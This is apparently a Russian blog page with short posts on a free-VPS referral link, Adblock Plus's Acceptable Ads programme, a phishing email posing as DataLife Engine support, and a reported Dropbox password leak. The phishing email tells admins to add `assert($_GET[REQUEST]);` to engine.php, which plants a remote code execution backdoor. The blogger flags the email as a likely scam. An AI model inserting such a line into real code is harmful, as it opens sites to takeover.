magbo system

Бесплатный VPS на Windows или Linux навсегда

Привет, сегодня в письме от hostinger наткнулся на ссылку, которая привела меня на сервис, который я так давно искал — бесплатный VPS! Да ещё и на windows!

И так приступим:

Для начала регистрируемся по моей ссылке (иначе долго ждать подтверждения): http://api.5jelly.com/redir/5905857 (жмём free vps если нам нужен сервер)

После регистрации может вылезти окно 403 с ошибкой (от хостгатора)
Не обращаем внимания — смотрим адресную строку, там у нас email, пароль, и сообщение о том, что теперь можно залогинится по адресу: http://cpanel.5jelly.com/ используя указанные email и пароль.

Profit! Теперь у вас есть бесплатный дедик на windows!

Сайт сервиса

Adblock Plus приглашает блоги и небольшие веб сайты бесплатно присоединиться к Инициативе Ненавязчивой Рекламы.

Adblock Plus приглашает блоги и небольшие веб сайты бесплатно
присоединиться к Инициативе Ненавязчивой Рекламы.
Adblock Plus, самое популярное расширение для браузеров по блокировке рекламы, с 2011
года развивает инициативу Ненавязчивой Рекламы для блогов и небольших сайтов. Данная
инициатива направлена на предоставление блогам и сайтам возможности поддерживать себя
при помощи неназойливого способа рекламы. С момента старта проекта Adblock Plus с
открытым исходным кодом в 2006 году главная цель заключалась в том, чтобы сделать
интернет приятным местом для всех пользователей, блокируя любого рода рекламу.
Дело в том, что интернет пользователи не любят онлайн рекламу, потому что в большинстве
своем она очень раздражает: всплывающие окна, мелькания, прыгающие баннеры,
выдвигающиеся блоки, громкое видео и т.д. Сегодня более 60 миллионов активных
пользователей Adblock Plus выбрали серфинг в интернете именно без такой отвлекающей
рекламы. Эти люди щелчком мыши «проголосовали» за Adblock Plus, сделав ABP самым
скачиваемым расширением для браузеров в мире.
Однако не стоит забывать о миллионах небольших и средних размеров сайтов и блогов,
выживание которых полностью зависит от дохода, полученного от рекламы. Многие из них
уделяют огромное внимание расположению содержимого на их сайте и выбирают
ненавязчивый путь представления рекламы. За 2013 год использование Adblock Plus возросло
на 49%. Чем больше становится число пользователей ABP, тем сильнее страдает
жизнеспособность таких сайтов и блогов. Именно поэтому Adblock Plus разработал
концепцию ненавязчивой рекламы (Acceptable Ads policy).
Ненавязчивая реклама рассматривается как компромисс между интересами пользователей и
разработчиков небольших веб-сайтов или авторов блогов. ABP нацелен на то, что все сайты и
блоги в долгосрочной перспективе найдут золотую середину, когда они могут поддерживать
существование за счет рекламы и, в то же время, не отталкивать и не беспокоить своих
пользователей.
Белый список ABP растёт с каждым днём. Множество небольших сайтов и блогов уже
извлекают выгоду из этого: 98% 60-миллионной аудитории Adblock Plus видят ненавязчивую
рекламу каждый день, увеличивая трафик и доход разработчиков сайтов и авторов богов.
Если у Вас есть небольшой или средних размеров сайт, и Вы хотите бесплатно участвовать в
Инициативе ненавязчивой рекламы, то ознакомьтесь с условиями и подайте заявку!

Критическая уязвимость сайтов на DLE

Screenshot_2014-10-19-11-03-12

 

Вот такое письмо пришло мне сегодня на почту от службы поддержки Datalife Engine. Я ожидал, что это будет сообщение о лицензии, но оказалось все намного серьезнее.

Здравствуйте, уважаемый клиент!



Благодарим Вас за использование на Вашем сайте shlyahten.ruнашего ПО «CMS DataLife Engine — Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: shlyahten.ru/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);



С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 199.27.128.202 

У меня есть предложение, что это развод. Так как такой код вполне может создать уязвимость. Ведь он ничего не фильтрует. Очень забавный и на мой взгляд эффективный способ взлома.

 

 

Слив паролей от dropbox

Базы логинов и паролей утекли на днях в сеть. Дропбокс утверждает, что взлома не было. База идёт в алфавитном порядке — видимо результат брутфорса. Неизвестные пообещали выкладывать базу частями (всего 7 000 000 данных) по мере поступления пожертвований на их биткоин-кошелек.

 

Вот первые три файла:

dropbox.com_hacked_first_teaser

dropbox.com_hacked_second_teaser

dropbox_hack_third_teaser